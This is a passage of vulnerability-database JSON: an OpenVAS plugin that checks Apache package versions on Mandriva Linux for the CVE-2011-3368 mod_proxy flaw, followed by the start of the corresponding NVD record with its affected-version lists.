{"id": "OPENVAS:831460", "type": "openvas", "bulletinFamily": "scanner", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "description": "Check for the Version of apache", "published": "2011-10-10T00:00:00", "modified": "2017-07-06T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=831460", "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "references": ["http://lists.mandriva.com/security-announce/2011-10/msg00017.php", "2011:144"], "cvelist": ["CVE-2011-3368"], "lastseen": "2017-07-24T12:55:21", "viewCount": 3, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-07-24T12:55:21", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3368"]}, {"type": "f5", "idList": ["SOL15889", "F5:K15889", "F5:K20979231"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1391", "ELSA-2011-1392"]}, {"type": "freebsd", "idList": ["4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0", "D8C901FF-0F0F-11E1-902B-20CF30E32F6D"]}, {"type": "threatpost", "idList": ["THREATPOST:0413CB7CEB3A83FB6F02DBDDD013A75E"]}, {"type": "openvas", "idList": ["OPENVAS:870505", "OPENVAS:136141256231070600", "OPENVAS:1361412562310881032", "OPENVAS:1361412562310831460", "OPENVAS:881032", "OPENVAS:1361412562310120513", "OPENVAS:1361412562310122067", "OPENVAS:70600", "OPENVAS:881020", "OPENVAS:1361412562310881020"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_D8C901FF0F0F11E1902B20CF30E32F6D.NASL", "CENTOS_RHSA-2011-1392.NASL", "ALA_ALAS-2011-9.NASL", "MANDRIVA_MDVSA-2011-144.NASL", "REDHAT-RHSA-2011-1392.NASL", "ORACLELINUX_ELSA-2011-1392.NASL", "APACHE_MOD_PROXY_INFO_LEAK2.NASL", "APACHE_MOD_PROXY_INFO_LEAK.NASL", "SL_20111020_HTTPD_ON_SL4_X.NASL", "ALA_ALAS-2011-09.NASL"]}, {"type": "httpd", "idList": ["HTTPD:F7A5E015190D03DEDD087C99CEE5A140", "HTTPD:428F24190DE7AFCBC94D3836B96A0602", "HTTPD:AA5F8228C297859EE599A23F56BA394E", "HTTPD:5CBB2FE29DAB23F81203059931DCD49C"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27148", "SECURITYVULNS:DOC:27611", "SECURITYVULNS:VULN:12166", "SECURITYVULNS:VULN:11968"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/REWRITE_PROXY_BYPASS"]}, {"type": "exploitdb", "idList": ["EDB-ID:17969"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:460143F0ACAE117DD79BD75EDFDA154B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105591", "PACKETSTORM:105672"]}, {"type": "seebug", "idList": ["SSV:20993", "SSV:20979", "SSV:20969"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2011-3368.NSE"]}, {"type": "amazon", "idList": ["ALAS-2011-009", "ALAS-2012-046"]}, {"type": "redhat", "idList": ["RHSA-2011:1391", "RHSA-2012:0128", "RHSA-2012:0323", "RHSA-2011:1392"]}, {"type": "centos", "idList": ["CESA-2012:0128", "CESA-2011:1392"]}, {"type": "suse", "idList": ["SUSE-SU-2011:1215-1", "SUSE-SU-2011:1229-1", "OPENSUSE-SU-2011:1217-1"]}, {"type": "ubuntu", "idList": ["USN-1259-1"]}, {"type": "fedora", "idList": ["FEDORA:E95B521B26", "FEDORA:4529E211C9"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2405-1:AE657"]}, {"type": "slackware", "idList": ["SSA-2012-041-01"]}], "modified": "2017-07-24T12:55:21", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "831460", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_id(831460);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_summary(\"Check for the Version of apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Mandrake Local Security Checks"}

{"cve": [{"lastseen": "2020-10-03T11:39:31", "description": "The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.", "edition": 5, "cvss3": {}, "published": "2011-10-05T22:55:00", "title": "CVE-2011-3368", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2018-01-09T02:29:00", "cpe": ["cpe:/a:apache:http_server:1.3.33", "cpe:/a:apache:http_server:2.0.40", "cpe:/a:apache:http_server:2.0.39", "cpe:/a:apache:http_server:1.3.27", "cpe:/a:apache:http_server:1.3.3", "cpe:/a:apache:http_server:2.2.15", "cpe:/a:apache:http_server:1.3.24", "cpe:/a:apache:http_server:2.0.34", "cpe:/a:apache:http_server:1.3.22", "cpe:/a:apache:http_server:2.2.11", "cpe:/a:apache:http_server:1.3.17", "cpe:/a:apache:http_server:2.0.56", "cpe:/a:apache:http_server:2.2.12", "cpe:/a:apache:http_server:2.2.1", "cpe:/a:apache:http_server:2.2.16", "cpe:/a:apache:http_server:2.0.32", "cpe:/a:apache:http_server:2.0.38", "cpe:/a:apache:http_server:2.0.35", "cpe:/a:apache:http_server:2.0.49", "cpe:/a:apache:http_server:1.3.10", "cpe:/a:apache:http_server:2.2.9", "cpe:/a:apache:http_server:2.0", "cpe:/a:apache:http_server:2.0.53", "cpe:/a:apache:http_server:2.0.50", "cpe:/a:apache:http_server:2.2.4", "cpe:/a:apache:http_server:1.3.16", "cpe:/a:apache:http_server:2.2.10", "cpe:/a:apache:http_server:2.0.58", "cpe:/a:apache:http_server:1.3.35", "cpe:/a:apache:http_server:2.2.19", "cpe:/a:apache:http_server:2.0.9", "cpe:/a:apache:http_server:1.3.6", "cpe:/a:apache:http_server:1.3.30", "cpe:/a:apache:http_server:2.0.59", "cpe:/a:apache:http_server:2.0.55", "cpe:/a:apache:http_server:2.0.28", "cpe:/a:apache:http_server:2.0.57", "cpe:/a:apache:http_server:1.3.39", "cpe:/a:apache:http_server:1.3.28", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:apache:http_server:2.2.13", "cpe:/a:apache:http_server:1.3.14", "cpe:/a:apache:http_server:1.3.36", "cpe:/a:apache:http_server:2.0.46", "cpe:/a:apache:http_server:2.2.6", "cpe:/a:apache:http_server:1.3.1", "cpe:/a:apache:http_server:1.3.20", "cpe:/a:apache:http_server:1.3.19", "cpe:/a:apache:http_server:2.0.45", "cpe:/a:apache:http_server:1.3.25", "cpe:/a:apache:http_server:2.0.41", "cpe:/a:apache:http_server:1.3.5", "cpe:/a:apache:http_server:1.3.37", "cpe:/a:apache:http_server:2.2.0", "cpe:/a:apache:http_server:2.2.18", "cpe:/a:apache:http_server:1.3.1.1", "cpe:/a:apache:http_server:2.0.63", "cpe:/a:apache:http_server:2.0.44", "cpe:/a:apache:http_server:1.3.4", "cpe:/a:apache:http_server:1.3.0", "cpe:/a:apache:http_server:2.2.20", "cpe:/a:apache:http_server:1.3.12", "cpe:/a:apache:http_server:1.3.34", "cpe:/a:apache:http_server:1.3.7", "cpe:/a:apache:http_server:1.3.8", "cpe:/a:apache:http_server:2.2.2", "cpe:/a:apache:http_server:1.3.26", "cpe:/a:apache:http_server:2.2.14", "cpe:/a:apache:http_server:1.3.13", "cpe:/a:apache:http_server:1.3", "cpe:/a:apache:http_server:1.3.41", "cpe:/a:apache:http_server:1.3.11", "cpe:/a:apache:http_server:1.3.38", "cpe:/a:apache:http_server:1.3.68", "cpe:/a:apache:http_server:2.0.37", "cpe:/a:apache:http_server:1.3.42", "cpe:/a:apache:http_server:2.2.21", "cpe:/a:apache:http_server:1.3.65", "cpe:/a:apache:http_server:2.0.61", "cpe:/a:apache:http_server:1.3.31", "cpe:/a:apache:http_server:2.0.54", "cpe:/a:apache:http_server:1.3.32", "cpe:/a:apache:http_server:2.0.43", "cpe:/a:apache:http_server:2.0.47", "cpe:/a:apache:http_server:2.0.36", "cpe:/a:apache:http_server:1.3.15", "cpe:/a:apache:http_server:2.0.42", "cpe:/a:apache:http_server:1.3.18", "cpe:/a:apache:http_server:1.3.2", "cpe:/a:apache:http_server:1.3.23", "cpe:/a:apache:http_server:2.0.60", "cpe:/a:apache:http_server:1.3.29", "cpe:/a:apache:http_server:2.0.52", "cpe:/a:apache:http_server:2.2.3", "cpe:/a:apache:http_server:2.0.51", "cpe:/a:apache:http_server:2.0.64", "cpe:/a:apache:http_server:1.3.9", "cpe:/a:apache:http_server:2.2.8"], "id": "CVE-2011-3368", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3368", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apache:http_server:1.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.22:*:*:*:*:*:*:*", 